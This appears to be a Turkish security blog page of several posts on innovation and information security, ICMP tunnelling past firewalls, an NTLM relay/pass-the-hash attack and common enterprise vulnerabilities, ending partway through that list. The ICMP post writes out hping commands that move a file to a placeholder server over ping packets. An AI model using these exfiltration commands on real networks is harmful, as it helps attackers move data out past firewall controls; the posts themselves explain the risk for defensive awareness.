Bilgi Güvenliğinde Teknik İnovasyon

İnovasyonun etkilerinin en rahat görülebileceği sektörlerin başında teknoloji sektörü gelmektedir. Teknoloji sektörü, diğer sektörlerle kıyaslandığında değişimde önde olan bir sektördür. Her yeniliğin bir değişim getirmesi durumu, her değişimin de bir yeniliğe aç olması durumunu beraberinde getirmektedir. Bu yüzden teknoloji sektörü için inovasyon, bir araçtan çok bir amaç haline gelmiştir.

İnovasyon konusunda geride kalan bir kurum, pazar payını çok hızlı bir şekilde kaybetme tehdidi ile karşı karşıya kalmaktadır. Çok hızlı gerçekleşen kayıplar benzer şekilde yeni kurulan bir şirketin çok hızlı bir şekilde sektör devi olmasına da altyapı sağlayabilmektedir. Hız ile ilgili bu durum özellikle teknoloji ve bilişim alanlarında hizmet veren kurumların karşılaştığı bir durumdur. Hızın ve değişimin yoğun olduğu bir sektörde inovasyon en önemli faktörlerden biri olarak rol oynamaktadır.

Sony PS örneği
Sony, ürettiği Playstation isimli konsol için oyunların korsan olarak çalıştırılmasını engelleyecek güvenlik önemleri geliştirmektedir. Bu güvenlik önlemleri sayesinde sadece orjinal satın alınmış oyunlar Playstation ile oynanabilir olmaktadır ve bu oyunların kopyaları yapılamamaktadır. Sony, bilgi güvenliğinin teknik olarak hayata geçirildiği bu durumdan yararlanarak, beraber çalıştığı oyun yapımcısı firmaların da ticari kazanç elde etmelerini amaçlamaktadır. Bugüne kadar Sony üç adet Playstation konsolu üretmiştir ve bu konsolların her birinde kopyalamaya karşı bu tip güvenlik önlemleri yer almıştır. Ancak Playstation 1 ve 2 isimli ürünlerde bu kopyalama koruması korsanlar tarafından hızlı bir şekilde aşılmış ve kopya oyunlar konsol üzerinde oynanabilir olmuştur.


Sony bu duruma bir çözüm olarak uyguladığı teknik güvenlik politikaları üzerinde bir yeniliğe gitmiş ve en son piyasaya sürdüğü Playstation 3 konsolunda bu yenilikleri uygulamıştır.

Uyguladığı yenilikler sayesinde rakiplerinin aksine Sony, ürünü için yaklaşık 4 yıl süren bir kopyalama koruması elde etmiştir. Ancak bu 4 yılın sonunda diğer piyasaya sürmüş olduğu eski ürünlerinde olduğu gibi kopyalamaya karşı koruma kırılmıştır. Bu rakam hem Sony’nin eski ürünlerine hem de rakiplerinin istatistiklerine bakıldığında yüksek bir oran olarak göze çarpmaktadır.

Bu durum hemen akıllara bilgi güvenliğindeki zaman boyutu kavramını getirmektedir. İnovasyon da bilgi güvenliğinde olduğu gibi zamana bağlı bir fonksiyondur. Zamanın ihtiyaçlarına ve değişen şartlara cevap vermeyi hedefler. Şüphesiz olan bir şey var ki, Sony bu cevabı verebilmek için Playstation 4 üzerinde güvenlik anlamında birçok yeniliğe imza atacaktır. Bir kurum olarak Sony, kendi çıkarlarını korumak zorunda ve karlılığını arttırmak zorundadır.

Devletlerdeki durum

Günümüzde bilgi güvenliğini önemseyen devletler, bilgi güvenliğinin kullanım alanlarında inovasyona giderek ülkelerinin ulusal çıkarlarını dahi korumayı hedeflemektedir.

2011 yılında Çin devleti tarihi bir açıklamayla, ilk kez bir "süper elit siber savaşçı birliğine" sahip olduğunu belirtti. Siber savaşçılardan oluşan ekibin, Çin Halk Kurtuluş Ordusu'nun (PLA) internet ağlarını dış saldırılardan korumak amacını taşıdığı ifade edildi.

Çin, 30 kişiden oluşan birliğin isminin "Mavi Ordu" olduğunu açıkladı. İngiltere'nin Times gazetesine konuşan eski bir PLA generali, Mavi Ordu'yu oluşturan kişilerin özel olarak seçildiğini ve "istisnai derecede yetenekli" insanlar olduğunu söyledi.

Devlet destekli Çin Silah Kontrolü ve Silahsızlanma Derneği'nin üst düzey araştırmacılarından Xu Guangyu, "İnternet sınır tanımıyor. Bu yüzden hangi örgüt veya ülkenin düşmanımız olacağını ve bize saldırabileceğini bilemeyiz. Mavi Ordu'nun asıl hedefi meşru müdafaa yapmak. Hiç kimseye saldırma eğiliminde değiliz" dedi. Bilgi güvenliğinde ve bilgi güvenliğinin kullanımında inovasyon yapılması bir kurum veya bir devletin faydasına olabilir. Hem bilgi güvenliği için inovasyonu hem de inovasyon için bilgi güvenliğini kapsayan bu örnek iki kavramın da sahip olduğu çok boyutluluğu gözler önüne sermektedir.

Kurumlardaki inovasyon

Bilgi güvenliği kurumlar için bir sermaye olan bilginin korunmasını hedeflemektedir. İnovasyon yönetimi ise kurumun karlılığını korumak veya arttırmak amaçlı yapılacak yenilikleri kapsar. Eğer bilginin korunması için bir yönetişim hayata geçirilecekse bu bir inovasyondur. Aynı şekilde inovasyon bilgi güvenliği sistemlerinin kendilerine uygulanabilecek yeniliklerden de oluşabilir. Bu durumlar gösterir ki, inovasyon yapmak isteyecek bir kurum bunu bünyesinde bilgi güvenliğini hayata geçirerek yapabilir. Aynı şekilde bilgi güvenliği konusunda yapılacak yenilikler de hem kurumlara hem de devletlere yeni kapıları aralama fırsatı tanıyabilir.
Gökhan MUHARREMOĞLU Devamı için tıklayın...

Bilgi Güvenliği & İnovasyon

Bilgi, çağımızdaki kurum sermayelerinden birini oluşturmaktadır. İnovasyon, kurumun sahip olduğu sermayenin ve kârın arttırılması ve böylece rekabette bir adım öne çıkılması sonuçlarını hedeflemektedir. Bilgi güvenliği, bilginin korunmasını hedeflemektedir, dolayısıyla bilgi güvenliği kuruma ait bir sermayenin korunmasını da amaçlamaktadır.

Sermaye ortak kümesinden bilgi ve inovasyona bakıldığında bilgi güvenliği ile olan ortak paydaları görmek de daha kolaylaşmaktadır. İnovasyonun amacı sermayenin korunması, arttırılması, kar oranının korunması, arttırılması iken, bilgi güvenliği de bu amaçlara hizmet vermektedir.

Bilgi güvenliği, kurumun bir sermayesi olan bilginin; gizliliğinin, erişilebilirliğinin ve bütünlüğünün korunması amacını hedeflemektedir. Bilginin bir sermaye olması nedeniyle koruma altına alınmış olması, kurumlar için elde edilecek maddi getirilerden biridir.

İnovasyon var olan yapının sürdürülmesi veya daha iyiye götürülmesi amacını taşır. Bilgi güvenliği süreçleri de kurum içinde aynı amaçları hedefleyen süreçlerdir.

Bir kurumda bilgi güvenliğine ait bir yönetim sisteminin hayata geçirilmesi başlı başına bir inovasyon olabilir. Bu örnekte inovasyon bilgi güvenliğini doğurur. Bilgi güvenliği ise sermayenin korunmasını ve karlılığın arttırılmasına yardımcı olunmasını hedefler.

Bilgi güvenliğinin hiç uygulanmamış bir kuruma uygulanması ile sağlanabilecek faydaya dair örnek bir senaryo oluşturarak bu kavramlar netleştirilebilir:
Bir yazılım şirketi bünyesindeki çalışanlar sistemciler, yazılımcılar ve satış elemanlarından oluşmaktadır. Bu şirket kendi pazarında yoğun rekabet halindedir ve bu yüzden bünyesindeki sermayenin çoğunu ürettikleri yazılım için gerekli olan iş gücü ve bilgiye ayırmaktadır.

Şirketin ürettiği yazılımın muadilleri piyasada mevcuttur ve şirket bu yazılımların üreticileri ile rekabet halindedir. Yazılım tasarımında yapılan ufak değişiklikler bile yazılımlara ait pazar payını ciddi oranlarda etkilemektedir. Şirket bünyesindeki yazılım ortamına sistemciler, yazılımcılar ve satış departmanından elemanlar ulaşabilmekte ve yazılım süreci için geliştirilen planlamalardan haberdar olmaktadırlar.

Her yıl yapılan stratejik toplantılarda ve her yeni yazılım ürününün piyasaya çıkması sonucu dengeye gelen pazar payının oranına bakıldığında, şirketin sektör lideri olmasıyla bulunduğu konum arasında ufak bir müşteri sayısı farkının olduğu görülmekte ve bu farkın şirkete büyük bir kâr imkânının kaçırılması olarak yansıdığı ortaya çıkmaktadır.

Sektörde rekabet için gerekli olan en önemli faktörlerden biri, şirketin ürettiği yazılım içinde sunduğu diğer rakiplerine göre getirdiği özellikler, yenilikler ve farklılıklardır. Ürüne ait özelliklerin önceden başka bir yazılımda bulunması veya ürün çıktıktan sonra hızlı bir şekilde taklit edilmesi şirketi pazar payını genişletmek konusunda zor durumda bırakmaktadır.

Hem kurumda hem de rakiplerinde şu güne kadar yapılmamış bir yeniliğin, sonuç olarak "inovasyon"un gerçekleştirilmesiyle bilgi güvenliği kapsamında bir standardın ve denetimlerin hayata geçirilmesi sonucunda yapılan tetkikler sonucunda ortaya şu bulgular çıkmıştır:

• Yazılım ortamına yazılım süreci ile ilgisi olmayan (satış elemanı, sistemci gibi) çalışanların erişmesinin bir bulgu olduğu saptanmıştır.

• Şirket bünyesinde bir bilişim güvenliği politikası kurulmadığından çalışanların bilgisayarlarında anti-virüs benzeri yazılımların bulunmadığı saptanmıştır.

• Kullanılan bilişim altyapısında şirket kullanıcıların internete yapılan çıkışları esnasında hiçbir güvenlik aşamasından geçmedikleri saptanmış ve kurum içinde çalışan sunucu ve kullanıcılara ait sistemlerin internetten doğrudan erişilebilir olduğu görülmüştür.

• Şirket bünyesinde domain altyapısı kullanılmaması nedeniyle kullanıcılara ait parolaların zayıf olduğu veya hiç parola kullanılmadığı bulgusuna erişilmiştir.

• Kullanılan yazılım geliştirme ortamının da bu bulgulardan etkilendiği görülmüştür.

Bu bulgulardan kaynaklı olarak şirket içindeki bilgilerin aşağıdaki nedenlerle sızdırıldığı tespiti yapılmıştır:

• Satış elemanları tarafından kullanılan bir taşınabilir bilgisayara truva atının yerleştiği,

• Bu truva atının anti-virüs kullanılmaması nedeniyle fark edilemediği,

• Satış elemanının yazılım ortamına erişimi olmasından dolayı bu truva atının yazılım ortamına ve diğer kullanıcılara da bulaştığı,

• İnternete doğrudan erişim sağlandığı için truva atının rakip şirketler tarafından fark edilerek yönetilmeye başlandığı,

• Domain altında olmayan ve parola kullanılmayan sunuculara truva atı sayesinde ulaşan rakip şirketlerin yazılımla ilgili bilgileri çaldıkları.

Yeni çıkacak olan yazılıma ait özelliklerin diğer şirketler tarafından önceden biliniyor olması ve hatta bu özelliklerinin teknik detaylarının da bu şirketlerin ellerinde olması nedeniyle, şirketin kendi ürünü için harcadığı zaman ve paranın rakiplerine aktarılması durumunu ortaya çıkarmıştır. Şirket sektörde hedeflediği yere gelememiştir ve zarara uğramıştır.

Şu ana kadar bahsi geçenler kurum açısından bir inovasyon olarak bilgi güvenliğinin ele alınmasıydı. Ancak, inovasyon çok yönlü bir kavram olması ve birçok alana uygulanabilir olması nedeniyle ortaya yeni bir başlık daha çıkartmaktadır. Bu başlık da "Bilgi Güvenliğinde İnovasyon"dur.

İnovasyonun süreçler için uygulanabilir olması ve bilgi güvenliğinin de aslında bir süreç ve yönetişim olgusu olması nedeniyle inovasyon, bilgi güvenliği için de uygulanabilir. Bu durumda ortaya bir inovasyon olarak bilgi güvenliği yerine bilgi güvenliği için inovasyon tanımı çıkacaktır.

Bu durumda inovasyonun genel geçer ilkelerine uyan bir yapı bilgi güvenliği için de hayata geçirilebilir. Bu ilkeler:

• İnovasyon bir vizyona sahip olmalıdır.

• İnovasyon müşteri odaklı olmalıdır.

• İnovasyon etik kurallara uygun olmalıdır.

• İnovasyon inovatif düşünmeyi desteklemelidir.

• İnovasyon sistemin bütününe bakmalıdır.

• İnovasyon farklı bilgi ve zengin etkileşim ortamlarıyla bütünleştirilmelidir.

• İnovasyon riskleri göze almalıdır.

• İnovasyon için gelecek trendler sürekli araştırılmalıdır.

• İnovasyon örgütün her üyesini içine almalı ve katkıları ödüllendirmelidir.

• İnovasyon için uyumlu öğrenme zemini yaratılmalıdır.

• İnovasyon her zaman bir direnç içerebileceği unutulmamalıdır.

Hem bilgi güvenliği yönetimi süreçlerinde hem de bilgi güvenliğinin teknik konularında inovasyon yapmak, bilgi güvenliğinden elde edilen faydayı, dolaylı yoldan da kurumun bilgi güvenliğinden sağladığı faydayı arttıracaktır.

Gökhan MUHARREMOĞLU

Devamı için tıklayın...

PING ile Port'suz Dosya Transferi Yaparak Firewall Aşmak

Bir sistemin açıklarını bulabilmek için öncelikle o sistemin nasıl çalıştığına dair bilgi edinmek gerekir. Daha sonra sistemde açık arayan kişi, edindiği bu bilgiyi sahip olduğu temel bilgilerle korelasyona sokmalıdır. Temel bilgiler, söz konusu bilişim ve bilgisayar dünyasının teknik altyapısı olduğunda; ağ bilgisi, yazılım bilgisi, sistem bilgisi, güvenlik bilgisi, donanım bilgisi gibi konuları içermektedir. Bir Güvenlik Duvarı(Firewall) üzerinde tanımlı olan kuralları aşmak için genel geçerden uzak bir yöntem arayan kişi önce bu Firewall’a ait yapıyı yapacağı testlerle incelemeli, daha sonra kendisinin sahip olduğu diğer bilgilerle konuyu mercek altına almalıdır.

Firewall kuralları tanımlanırken en önemli güvenlik ilkesi aşırı yetkilendirmeden kaçınmaktır. Hem dışardan içeriye doğru olan hem de içeriden dışarıya doğru olan trafiğin, minimum yetkilerle, mümkün olduğunca “any” kuralı kullanmadan, sadece gerekli olan Protokol ve Port’lar için tanımlanması temel güvenlik anlayışının odağıdır. Bu ilkelere uyarken göze çok masum görünen ICMP protokol trafiği genelde göz ardı edilir. Esas odaklanılan nokta her zaman Port’lar ve diğer Protokol’ler olur. Ancak, bir güvenlik ilkesi uygulanırken istisna gözetmemek, gözetilirse de bu istisnaları da bir risk olarak değerlendirmek gerekir.

Eğer ICMP trafiğini açmak bir risk ise bu riskin nasıl bir tehdit ile hayata geçebileceğini de bilmek gerekir. Öncelikle ilk akılda olması gereken, Firewall üzerinde içerden dışarı, dışardan içeriye açık olan ICMP mesajlarının yerel ağda ve/veya İnternet’te ICMP üzerinde hizmet veren servisleri ifşa edeceğidir. Bunlara en ünlü örnekler PING (Echo & Echo Reply) ve TRACEROUTE ICMP mesaj tipleridir.

ICMP mesaj tipleri şu şekilde listelenebilir:
Type 0 — Echo Reply
Type 1 — Unassigned
Type 2 — Unassigned
Type 3 — Destination Unreachable
Type 4 — Source Quench
Type 5 — Redirect
Type 6 — Alternate Host Address
Type 7 — Unassigned
Type 8 — Echo
Type 9 — Router Advertisement
Type 10 — Router Selection
Type 11 — Time Exceeded
Type 12 — Parameter Problem
Type 13 — Timestamp
Type 14 — Timestamp Reply
Type 15 — Information Request
Type 16 — Information Reply
Type 17 — Address Mask Request
Type 18 — Address Mask Reply
Type 19 — Reserved (for Security)
Types 20-29 — Reserved (for Robustness Experiment)
Type 30 — Traceroute
Type 31 — Datagram Conversion Error
Type 32 — Mobile Host Redirect
Type 33 — IPv6 Where-Are-You
Type 34 — IPv6 I-Am-Here
Type 35 — Mobile Registration Request
Type 36 — Mobile Registration Reply
Type 39 — SKIP
Type 40 — Photuris
Types 41-252 — Unassigned
Type 253 — RFC3692-style Experiment 1
Type 254 — RFC3692-style Experiment 2


Bir sistemin canlı olup olmadığını anlamak için Echo & Echo Reply ICMP mesajları kullanılır. Günümüzde bu mesajlardan bahsedilirken bu mesajları oluşturmak için kullanılan komutun adı, yani PING kelimesi kullanılır. PING ile gönderilen mesajların geçişine izin verildiği ağlarda canlı olan sistemleri bulmak çok kolay hale gelir. Güvenlikte amaç bir saldırganın işini zorlaştırırken bunu kullanılabilirlikten az fedada bulunarak yapmak ise, ICMP trafiğinin dolayısı ile PING ile yollanan Echo mesajlarının da kapatılması önerilebilir.

PING (ICMP Echo) mesaj paketlerinin bir ağ dinleme programı olan Wireshark ile görüntüsü şu şekildedir:


Şekil-1 Google DNS Sunucusuna (8.8.8.8) PING ile Echo isteği (ping) yollanması


Şekil-2 Giden Echo paketi


Şekil-3 Gelen cevap

Şekil-1’de 8.8.8.8 adresinin 32 Bayt veri ile yoklandığından bahsediliyor. Ağ dinlendiği zaman bunu doğrulamak ve içeriği görmek mümkün olabilmektedir


Şekil-4 32 Bayt veri

Şekil-4’e bakıldığında 32 Bayt verinin sadece (abcdef...) harflerinden oluştuğu görülmektedir. Bu veri Windows’un PING komutu tarafından ilgili paketin veri kısmına yerleştirilmiştir. Herhangi bir özel kullanım amacı yoktur. Aynı isteği daha fazla Bayt ile de yollamak mümkündür.


Şekil-5 64 Bayt veri


Şekil-6 Giden veri içeriği

Şekil-6’da Giden verinin içeriğinin tekrarlı harf dizilerinden oluştuğu görülebilmektedir.

Verilen örneklerde bir amaç uğruna kullanılmayan veri içeriğini bir amaç uğruna kullanmak mümkündür. Örneklerde gösterilen verinin yerine bir dosyaya ait veri parçaları yerleştirerek karşı tarafa iletebilmek mümkün olacaktır. ICMP mesajlarının ulaştığı karşı tarafta, her giden paketin içi açılıp, bu veriler ayıklanarak birbiri ile birleştirildiğinde bir dosya oluşturabilir. Bu durumda, Firewall arkasında her yöne bütün Protokol ve Port’ların kapalı olduğu ancak ICMP mesajlarının açık olduğu bir sistemde dışarıya veri yollamak ve dışarıdan veri almak mümkün olacaktır.


Şekil-7 Örnek bir ağ topolojisi

Verilen ağ topolojisinde GOKHAN-PC olarak tanımlanmış Node’dan SUNUCU olarak tanımlanmış Node’a ICMP mesajları ile dosya transfer edilebilir. Ağa yollanan paketleri manipüle etmeye yarayan bir araç (HPING) bir dosyanın karşıya transfer edilmesine yardımcı olacaktır.


Şekil-8 PC ve sunucu

GOKHAN-PC tarafında bulunan 69 Bayt'lık “dosya.txt” dosyasının sunucu tarafına aktarılması için kullanılacak komutlar aşağıda sıralanmıştır.

SUNUCU tarafında ICMP mesajlarını dinleyecek komut:

Hping2 GOKHAN-PC_IP_Adresi --listen imza --icmp -I eth0 > alinan_dosya.txt

Şekil-9 SUNUCU tarafında ICMP mesajlarını dinleyecek komut

Dosyayı yollayacak Node (GOKHAN-PC ) tarafında kullanılması gereken komut:
Hping3 SUNUCU_IP_Adresi --icmp -d 73 --sign imza --file dosya.txt -c 1 –I eth0

Şekil-10 Dosyayı yollayacak Node (GOKHAN-PC ) tarafında kullanılması gereken komut

Burada bazı parametrelerden bahsetmek yerinde olacaktır.
--icmp: Gönderilen paketin cinsi (Protokol) -d: Paketin başlık bilgisi dışında kalan veri boyutu --sign: Capture işlemi için tetikleyici kelime --file: Dosya --fast: Transfer hızı için takma ad -c: Paket sayısı -I: Bağdaştırıcı --listen: Dinleme modu

Paketler yollanırken her paket için “imza” nedeniyle 4 Byte veri kaybolmaktadır. 69 Bayt’lık bir dosyayı doğru ulaştırmak için 73 Bayt veri paketi yollamak gerekmektedir. Yoğun ağlarda paketlerin ulaştığından emin olmak için “--safe” parametresi kullanılabilir. Listen mode için Hping2 önerilir.

Yollanacak paket boyutunu kestirmek için şu formülden yararlanılabilir:
Dosya Boyutu[file] = (Paket Boyutu[d] – İmza Boyutu [sign]) X (Paket Sayısı [c])

Örnekteki dosya için bu denklem: 69 = (73-4) X 1 olmuştur.


Şekil-11 SUNUCU tarafındaki alınan dosya


Şekil-12 Gönderilen paket içeriği

ICMP Mesajları ile dosya yollanabildiği gibi bu mesajlar ile tünelleme de yapılabilmektedir. Linux ortamında çalışan “ptunnel” isimli bir uygulama ICMP mesajları ile uzak sunucudaki bir Port’u, localhost altında bulunan başka bir Port’a yönlendirmek için kullanılmaktadır.

ICMP mesajları hakkında verilen bu bilgiler ışığında çoğu zaman göz ardı edilen ve en zararsız, masum protokollerden sayılan ICMP’nin yeri geldiğinde bütün güvenlik anlayışını tersine çevirebileceği görülmektedir. Firewall üzerinde dışarıya doğru açık bırakılan bir kapının olması, bütün pencerelerin de kapandığı anlamına gelmemektedir. Sadece DNS UDP 53 Port’u ile dışarıdan sorgu alan yinelemeli bir iç DNS sunucusu, DNS tünelleme ile sömürülerek İnternet üzerindeki başka bir sunucudan aldığı veriler aracılığıyla Firewall aşılarak İnternet’e çıkış yapmak mümkün olabilmektedir. Birçok tünelleme yöntemi Firewall aşmada önemli bir araçtır. Ancak bu tünelleme yöntemlerinden en etkilisi hiçbir Port’a ihtiyaç duymayan ICMP tünellemedir.

Güvenlik ile ilgili kararlar alınırken, teknik olarak yapılabilecekler konusunda, konusuna hakim kişilerin görüşlerinin de alınması önerilmektedir. Günümüzde çok kolay gibi gözüken ve ilgileneni çok bulunan Firewall kuralı yazmak konusunda dahi bilinmeyen çok detayın olduğu buradaki örneklerle gözler önüne serilmiştir.

Gökhan MUHARREMOĞLU Devamı için tıklayın...

NTLM over HTTP Evil Proxy (MiTM) ve Pass The Hash Saldırısı

NTLM over HTTP Authentication protokolü, "Local Intranet" alanlarında son dönemde çok yaygın olan bir saldırı yöntemine maruz kalmaktadır. Bu yöntemde Intranet'te gezinen domain kullanıcılarının, Internet Explorer (IWA) tarafından otomatik yollanan NTLM kimlik bilgileri, kötü niyetli olarak hazırlanmış bir Proxy'den geçirilir ve yine Intranet altındaki başka bir sunucuya yetkisiz erişim sağlamak için kullanılır. Özetle, kullanıcının farkına varmadan yolladığı NTLM kimlik bilgileri bir Proxy'ye yönlendirilir ve bu Proxy'nin başka bir sunucuya giriş yapması sağlanır.

Genel bir saldırı senaryosu şu şekilde özetlenebilir:
"Intranet'te bulunan bir sitedeki XSS açığı veya herkese açık bir paylaşım (share) kullanılmasıyla sahte Proxy’nin çalıştığı site adresinin kullanıcı tarafından ziyaret edilmesi sağlanır. Bundan sonraki adımda, Internet Explorer bu adresi Trust Zone içinde (Intranet) görüp, NTLM ile Authentication yapmaya çalışarak hash bilgilerini bu sahte Proxy’ye yollar. Sahte Proxy önceden belirlenmiş bir sunucuya bu Hash bilgilerini iletir (Pass The Hash) ve yetkisiz erişim Proxy tarafından sağlanmış olur."

Yöntemi incelemeden önce NTLM mesaj tipleri ve NTLM over HTTP kimlik doğrulama aşamaları hakkında kısa bir bilgilendirme yapmak yerinde olacaktır. NTLM over HTTP için kullanılan mesaj tipleri ile bağlantıyı mantıksal olarak daha güvenli hale getirmek ve gerekli kimlik bilgilerini elde etmek hedeflenir. Bu kimlik bilgileri elde edilirken, Hash bilgilerinin iletişim kurmaya çalışan iki tarafa has bilgilerle donatılması hedeflenir. Böylece bütün bir paroladan elde dilen Hash bilgisi değil, tarafların birbirleri hakkında sahip olabilecekleri bilgilerden elde edilmiş Hash bilgileri kimlik doğrulama aşamasının temelini oluşturur. Kullanılan mesaj tipleri (Type) şunlardır:

Type1: Bu mesaj tipinde istemciye ait “host name” ve “domain name” bilgileri bulunur.
Type2: Bu mesaj tipinde sunucuya ait NTLM challenge bilgisi bulunur.
Type3: Bu mesaj tipinde “username”, “host name”, “NT domain name” ve iki adet "paroladan üretilmiş" cevap içeriği daha bulunur.
Type mesajlarınının içeriği NTLM versiyon içeriklerine göre farklılık gösterse de kullanılan mantıksal yapı aşağıdaki gibi olup, anlatılacak olan Proxy saldırısı yöntemine dair bir çözüm getirmemektedir.
Normal bir NTLM over HTTP bağlantısı aşağıda gösterildiği gibi gerçekleştirilir:

• En önce istemci tarafından HTTP istek yollanır, • Buna karşılık sunucu tarafı NTLM kimlik doğrulaması için kendinde var olan standartları söyler ve Type1 mesaj ister,
• İstemci gerekli bilgiyi sağlayarak Type 1 mesaj bilgisini sunucuya ulaştırır ve Type 2 mesajı ister,
• Sunucu istemciye istediği Type 2 mesajı yollar ve Type 3 mesaj için beklemeye geçer,
• İstemci, sunucuya Type 3 mesaj bilgisini iletir ve bu bilginin onaylanarak TCP tabanlı oturumun açılmasını bekler, eğer kimlik doğrulama gerçekleşmez ise oturum açılmaz.



Arada kötü niyetli bir Proxy’nin olduğu durumlarda ise bağlantı şu şekilde gerçekleşir:

• En önce istemci tarafından HTTP istek yollanır,
• Saldırgan Proxy bunu ulaşmak istediği sunucuya iletir.
• Buna karşılık sunucu tarafı NTLM kimlik doğrulaması için kendinde var olan standartları söyler ve Type1 mesaj ister,
• Saldırgan Proxy bunu istemciye iletir.
• İstemci gerekli bilgiyi sağlayarak Type 1 Hash bilgisini sunucuya ulaştırır ve Type 2 mesajı ister,
• Saldırgan Proxy bunu ulaşmak istediği sunucuya iletir.
• Sunucu istemciye istediği Type 2 mesajı yollar ve Type 3 mesaj için beklemeye geçer,
• Saldırgan Proxy bunu istemciye iletir.
• İstemci, Proxy'ye Type 3 mesaj bilgisini iletir. Proxy de bu bilgiyi sunucuya aktarır ve bu bilginin onaylanarak TCP tabanlı oturumun açılmasını bekler. Eğer kimlik doğrulama gerçekleşmez ise oturum açılmaz.

Oturum açılma adımı gerçekleştiği anda TCP bağlantının ucunda olan saldırgan Proxy olduğu için, oturum bu Proxy üzerinden açılmış olur. Artık istemciye gerek yoktur ve Proxy ile istemci arasındaki bağlantı sonlandırılarak, ulaşmak istenen sisteme yetkisiz erişim sağlanmış olur.


NTLM Authentication'ın doğası gereği etkilendiği bilinen diğer saldırı yöntemleri şunlardır:
1. NTLM Downgrade
2. NTLM Challenge Spoofing
3. Spoofing tabanlı Man In The Middle saldırıları
4. Ağda yakalanan Challenge Key'leri ile NTLM Hashlerinin kırılması

TCP tabanlı oturum açma yöntemini kullanan bir kimlik doğrulama sisteminin, bütün doğrulama adımlarını OSI 7. Uygulama katmanında HTTP paketleri içinde çözüyor olması, burada anlatılan sorunun kök nedeni sayılabilir. Proxy’ler iyi amaçla kullanılıyor olsalar bile doğaları gereği araya giren üçüncü şahıs durumundadırlar.

Arada Proxy kullanılabilen her çeşit kimlik doğrulama yöntemi bu tarz saldırılara maruz kalabilir. Bu durumda yukarıda anlatılan saldırı tipi için alınabilecek önlem şu şekilde olabilir:

Intranet’te Domain dahilinde gezinirken, Internet Explorer ayarlarında “Local Intranet” güvenlik ayarının seçilmesi, tarayıcı ile yapılan gezinti yerel ağ içindeyse otomatik oturum açma özelliğini de devreye sokmaktadır. Bu otomatik oturum açma özelliği IE ayarlarından kapatılabilir ve kimlik bilgilerinin manuel girilmesi sağlanabilir. Böylece kullanıcı farkında olmadan Hash bilgileri başka sunuculara yollanmayacaktır. Ancak, saldırgan Proxy tarafından koşturulan sahte bir ekrana manuel giriş yapılması durumunda Hash bilgilerinin tekrar karşıya iletilmesi ve saldırının başarılı olarak sonuçlanması daima olanaklıdır.

Gökhan MUHARREMOĞLU Devamı için tıklayın...

Kurumsal Ağlarda En Çok Karşılaşılan Açıklar ve 10 Kök Neden - II (2/2)

Güncelleştirme Eksiklikleri
Üçüncü parti yazılım, işletim sistemi veya donanım gibi ağ öğeleri kullanan her kurum, bu öğelerin “ürün” niteliğindeki güvenliğini yayımcı firmalarına teslim etmiş durumdadır. Dolayısı ile kurumlar kendi ağlarına ait güvenliğin bazı halkalarını da bu yayımcı firmalara teslim etmiş sayılabilirler.

Bu kök neden altında değerlendirilebilecek bazı açıkları sizlerle paylaşmak istedim.

1-DNS İstemcisi Uzaktan Kod Çalıştırma Açığı

LLMNR protokolü DNS’in yerine kullanılacak bir protokol olmaktan ziyade klasik DNS çözümlemesinin mümkün olmadığı durumlarda kullanılabilecek peer-to-peer protokoldür. Windows DNS istemcisinde bulunan bir açık Link-local Multicast İsim Çözümlemesi (LLMNR) sorgularının sistemde “NetworkService” hesabıyla kod çalıştırabilmesine izin vermektedir. Bu açığı kullanan bir saldırgan sistemde “NetworkService” hesabıyla uzaktan kod çalıştırarak yetkisiz erişim sağlayabilir.

2-Debian OpenSSL Paketi Rastgele Sayı Üretme Açığı

SSH servisi, rastgele sayı üretme konusunda zayıflığı bilinen, tahmin edilebilir sayılar üreten bir Debian Linux sürümü üzerinde çalışmaktadır. Bu durum, SSH için üretilen sertifika ile şifrelenen ağ trafiğinin bir saldırgan tarafından kolayca çözülebilmesi ile sonuçlanmaktadır. Sorunun kaynağı OpenSSL kitaplığındaki rastgele sayı üreticisi (random number generator) olarak bilinmektedir.

3-Microsoft Windows Server Servisi Uzaktan Kod Çalıştırma Açığı

Windows'un "Server" isimli servisinde (Suncu Hizmeti) uzaktan kod çalıştırma ve sistem yönetimini ele geçirme ile sonuçlanabilecek bir açık bulunmaktadır. "Server" servisi bir Buffer Overrun (arabellek yığılması) açığından etkilenebilir. Bu açıktan yararlanmak isteyen bir saldırgan "System" yetkileri ile sunucu üzerinde kod çalıştırabilir ve sistemi tümüyle ele geçirebilir Bu açık “Mal/Generic-A”, “Trojan.Gimmiv.A” ve “W32.Wecorl” , “Conficker “ gibi bazı zararlı yazılımlar tarafından sömürüldüğü bilinmektedir.

4-SMB Uzaktan Kod Çalıştırma Açığı

Söz konusu güvenlik açığından etkilenen sistemlerde uzaktan kod yürütülebilmektedir. Bu güvenlik açığından başarıyla yararlanan bir saldırgan program yükleyebilir, verileri görüntüleyebilir, değiştirebilir veya silebilir. Tüm kullanıcı haklarına sahip olan yeni hesaplar oluşturabilir veya DoS saldırıları düzenleyebilir. Açığın kullanım şekli, SMB ortamına oturum açılmasını şart kılmamaktadır. 445 portuna yollanan bir paket, authentication gerektirmeden sistemin etkilenmesi için yeterlidir.

5-MSDTC Uzaktan Kod Çalıştırma Açığı

MSDTC (Microsoft Dağıtılmış İşlem Düzenleyicisi ) çeşitli sistem kaynakları arasındaki işlem koordinasyonunu sağlamaktadır. Söz konusu güvenlik açığından etkilenen sistemlerde uzaktan kod yürütülebilmektedir. Bu güvenlik açığından başarıyla yararlanan bir saldırgan program yükleyebilir, verileri görüntüleyebilir, değiştirebilir veya silebilir. Tüm kullanıcı haklarına sahip olan yeni hesaplar oluşturabilir ve hizmet engelleme saldırıları düzenleyebilir.

6-HP Data Protector Uzaktan Kod Çalıştırma Açığı

HP Data Protector istemcisi veya sunucusu uzaktan kod çalıştırmaya imkan veren bir açıktan etkilenmektedir. Bu açıktan istifade etmek isteyecek bir saldırgan, özel olarak hazırlanmış bir paket ile uygulamanın çalıştığı Host üzerinde “SYSTEM” hesabı yetkileri ile kod çalıştırabilir ve yetkisiz erişim sağlayabilir.

7-Windows 2000 - Desteklenmeyen İşletim Sistemi Kullanımı

Yaşam döngülerinin tamamlandığı ilan edilen yazılımlar için üretici firmaları destek vermeyi bırakırlar. Bu yazılımlar, yaşam döngüsünün sonuna ulaştığı ilan edildiğinde, yeni güvenlik güncelleştirmeleri yayınlanmayacağından o tarihten itibaren çıkan açıklar için savunmasız kalırlar.

8-Exchange Sunucusu Uzaktan Kod Çalıştırma Açığı

